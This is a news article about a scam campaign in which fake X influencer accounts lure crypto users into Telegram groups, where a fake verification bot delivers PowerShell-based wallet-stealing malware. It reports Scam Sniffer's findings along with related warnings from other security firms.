Telegram bots are used by scammers to spread crypto-stealing malware.
Scammers are employing a novel and sophisticated strategy to steal cryptocurrency, combining fake X (formerly Twitter) accounts, fraudulent Telegram channels, and malicious bots, according to blockchain security firm Scam Sniffer.
This marks a concerning evolution in cybercrime targeting the crypto community. In a Dec. 10 post on X, Scam Sniffer described the methodology. Scammers set up fake X accounts impersonating prominent crypto influencers. These accounts are used to lure unsuspecting users into Telegram groups by offering exclusive investment insights and other enticing opportunities. Once users join the Telegram group, they are asked to complete a verification process through “OfficiaISafeguardBot,” a fake Telegram verification bot.
The bot employs psychological tactics, such as creating a sense of urgency by providing very short timeframes for verification. However, instead of verifying anything, the bot injects malicious PowerShell code into the user’s system. This code downloads and executes malware, compromising the victim’s computer and accessing crypto wallets. The malware often targets private keys, enabling the scammers to raid the victims' wallets and steal their funds.
Scam Sniffer has identified numerous cases where this method has led to significant crypto theft. The firm confirmed that in all recent instances they’ve analyzed, the root cause was traced back to the fake verification bot. While it remains uncertain if other malicious bots are involved, Scam Sniffer noted how easy it is for scammers to replicate this technique and impersonate additional accounts.
According to Scam Sniffer, while malware targeting crypto users is not new, the infrastructure behind these scams has advanced considerably. This evolution has given rise to “scam-as-a-service” operations, where scammers develop tools like crypto wallet-draining malware and lease them to phishing scammers. These operations have become more sophisticated as demand and the profitability of such scams increase.
Impersonation scams have also seen a sharp rise. Scam Sniffer’s monitoring system detected an average of 300 fake X accounts daily in December, almost double November’s average of 160. These fake accounts often share malicious links and promote fake tokens, preying on unsuspecting users.
At least two victims have reportedly lost over $3 million by clicking on these malicious links and unknowingly signing fraudulent transactions. These staggering losses highlight the effectiveness of this combined social engineering and malware tactic.
The risk isn’t limited to casual crypto investors. Web3 professionals are also being targeted. Cado Security Labs recently uncovered a campaign using fake meeting apps to inject malware, stealing credentials for websites, applications, and crypto wallets. This tactic underscores the expanding scope of threats within the Web3 ecosystem, targeting not only funds but also sensitive credentials and access.
Adding to the urgency, Web3 security platform Cyvers issued a warning about a likely increase in phishing attacks during December. With the holiday season driving a surge in online transactions, hackers are seeking to exploit the increased activity.
What's Your Reaction?
